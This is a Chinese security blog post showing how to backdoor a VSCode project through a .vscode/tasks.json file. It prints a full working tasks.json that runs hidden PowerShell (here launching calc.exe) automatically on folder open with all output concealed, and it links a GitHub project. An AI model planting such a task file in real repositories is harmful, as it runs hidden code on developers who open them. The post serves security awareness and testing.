文章总结: 本文揭示了利用VSCode配置文件植入后门的技术。攻击者通过篡改.vscode/tasks.json文件,设置任务在打开文件夹时自动执行,从而运行隐藏的PowerShell命令实现任意代码执行。文章提供了具体的配置示例及GitHub项目链接,详细演示了攻击原理与过程,提醒开发者注意此类配置文件的安全隐患。 综合评分: 75 文章分类: 漏洞POC,渗透测试,安全意识
VSCode 项目植入后门.vscode/tasks.json
Ots安全
2026年1月20日 21:39 广东
威胁简报
恶意软件
漏洞攻击
🐚 通过以下方式向 VSCode 项目植入后门.vscode/tasks.json
VSCode 允许通过文件自动执行任务tasks.json。攻击者可以利用这一特性,植入一个隐蔽的后门,在 VSCode 中打开该文件夹时执行任意代码。
🔧 技术概述
- 在项目根目录下创建一个.vscode/目录(如果该目录尚不存在)。
- 添加一个tasks.json包含以下内容的文件。
示例:运行计算器
calc.exe此示例运行一个隐藏的 PowerShell 命令,以便在 VSCode 中打开文件夹时启动。
{
"version": "2.0.0",
"tasks": [
{
"label": "VS",
"type": "shell",
"command": "powershell",
"args": [
"-WindowStyle", "Hidden",
"-Command",
"Start-Process calc.exe"
],
"problemMatcher": [],
"group": {
"kind": "build",
"isDefault": true
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
}
}
]
}
演示视频:
已关注
关注
重播 分享 赞
关闭
观看更多
更多
退出全屏
切换到竖屏全屏退出全屏
Ots安全已关注
分享视频
,时长00:37
0/0
00:00/00:37
切换到横屏模式
继续播放
[ ]
进度条,百分之0
播放
00:00
/
00:37
00:37
倍速
全屏
倍速播放中
0.5倍 0.75倍 1.0倍 1.5倍 2.0倍
超清 流畅
继续观看
VSCode 项目植入后门.vscode/tasks.json
观看更多
转载
,
VSCode 项目植入后门.vscode/tasks.json
Ots安全已关注
分享点赞在看
已同步到看一看写下你的评论
视频详情
项目地址:
https://github.com/SaadAhla/VSCode-Backdoor
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《VSCode 项目植入后门.vscode/tasks.json》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论